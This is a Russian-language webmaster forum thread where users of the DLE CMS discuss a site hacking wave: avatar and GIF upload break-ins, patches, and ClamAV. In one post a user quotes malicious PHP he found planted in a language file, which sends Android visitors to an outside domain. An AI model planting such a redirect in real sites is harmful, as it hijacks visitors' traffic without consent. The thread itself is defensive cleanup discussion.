Вирус на сайте cms dle

Ruceek
На сайте с 21.09.2010
Offline
90
#261

спасибо топику, удалил сразу левых пользователей, но у меня видимо или не смогли, либо не успели нигде аватарку залить, хотя теперь уже патч новый я залил.

До этого не стояло и потом по логам сервера спалил, что пытались проспамить и поломать его, но так как все на сервере, видимо не удалось это сделать

ower_xz
На сайте с 20.11.2007
Offline
45
#262
bunina:
Точно, и взламывали разные версии, через аватарку

Если про 9.6...

1. Это факт был в логах зафиксирован на 9.6 или это наугад вывод только потому, что человек с таким ником был зарегистрирован?

Я в этом топике ни одного куска лога не увидел, подтверждающий, что 9.6 взломали именно через аву..

2. Для 9.6 было выпущено три баг-фикса. Все установлены на сайте?

Про нуллы никто никакой гарантии не даст, поэтому и говорить про них нет смысла.

На оф. сайте на эту тему паниковали те, у кого либо патчи не стояли, либо у кого уже 9.7 стояла, либо до кучи сайты с дырявыми модулями. Некоторые, кстати, патчи не ставили только потому, что у них модули переставали работать, т.е. сознательно шли на "подрыв"... :)

PK
На сайте с 22.05.2009
Offline
89
#263

bunina

как-то так, потому что бот регился приблизительно 8-ого января, а ломали(менялась дата файлов) через дней 10

Belomor
На сайте с 28.02.2012
Offline
38
#264

Сейчас в панели ispmanager в настройках сервера заметил возможность установки Антивируса Clamav, не долго думая я его установил, кто в курсе что это за бесплатный зверёк и стоит ли его включить ?

WebAlt
На сайте с 02.12.2007
Offline
266
#265
Belomor:
Сейчас в панели ispmanager в настройках сервера заметил возможность установки Антивируса Clamav, не долго думая я его установил, кто в курсе что это за бесплатный зверёк и стоит ли его включить ?

http://www.clamav.net/lang/ru/about/

bratoz
На сайте с 11.09.2009
Offline
143
#266

А у меня везде этот сайт в моб версии.

Уже все файлы перелапалтил, удалил много кода, но так и не нашел оставшиеся...

У кого ещё был код с этим сайтом? Какие файлы правили?

refresh-browser.00xff.net

Вот такой код

if(stripos($_SERVER['HTTP_USER_AGENT'],"Android")!==false)

{header('Location: http://refresh-browser.00xff.net/');exit;}

Нашел последний код.

По этому пути был

/language/Russian/website.lng

Аренда ссылок ad*lt (http://links.izibit.net/public/sites), со старых трастовых сайтов 18+(2-8 лет)
FX45
На сайте с 11.05.2009
Offline
90
#267

если на сайте закрыть регистрацию новых пользователей, то проблема решится?

SEOCondition
На сайте с 03.10.2011
Offline
118
#268
FX45:
если на сайте закрыть регистрацию новых пользователей, то проблема решится?

нет :) попытаться убежать от проблемы != её решить.

[⚡] PBN под ключ, обслуживание, консультации — обращайтесь в личку
R
На сайте с 24.01.2008
Offline
180
#269
Belomor:
Сейчас в панели ispmanager в настройках сервера заметил возможность установки Антивируса Clamav, не долго думая я его установил, кто в курсе что это за бесплатный зверёк и стоит ли его включить ?

Почему нет, только не ориентируйтесь на него полностью, он может быть полезным сигнализатором того, что у вас есть проблемы с вредоносными кодами.

Если сами не справляетесь не стоит делать какие-то ограничения по скрипту, лучше всего выяснить источник, стучите проверим на вирусы + дадим рекомендации!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
ower_xz
На сайте с 20.11.2007
Offline
45
#270
Belomor:
Сейчас в панели ispmanager в настройках сервера заметил возможность установки Антивируса Clamav, не долго думая я его установил, кто в курсе что это за бесплатный зверёк и стоит ли его включить ?

Можно, но это не панацея... Он больше предназначен для защиты файлов сервера, а не файлов конкретного сайта неизвестно какой cms.

FX45:
если на сайте закрыть регистрацию новых пользователей, то проблема решится?

Нет, это зависит от того, кому разрешено публиковать новости. Ведь взломы идут через файлы, поддерживающие анимацию, т.е. gif.

bratoz:
А у меня везде этот сайт в моб версии.
Уже все файлы перелапалтил, удалил много кода, но так и не нашел оставшиеся...
У кого ещё был код с этим сайтом? Какие файлы правили?

Стесняюсь спросить... У вас основное направление сайта - именно WEB, а не для мобильных устройств? Вы когда сайт устанавливали права на файлы мобильного шаблона (включая htaccess шаблона для мобильной версии) тоже выставляли как указано в документации или продинамили за ненадобностью?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий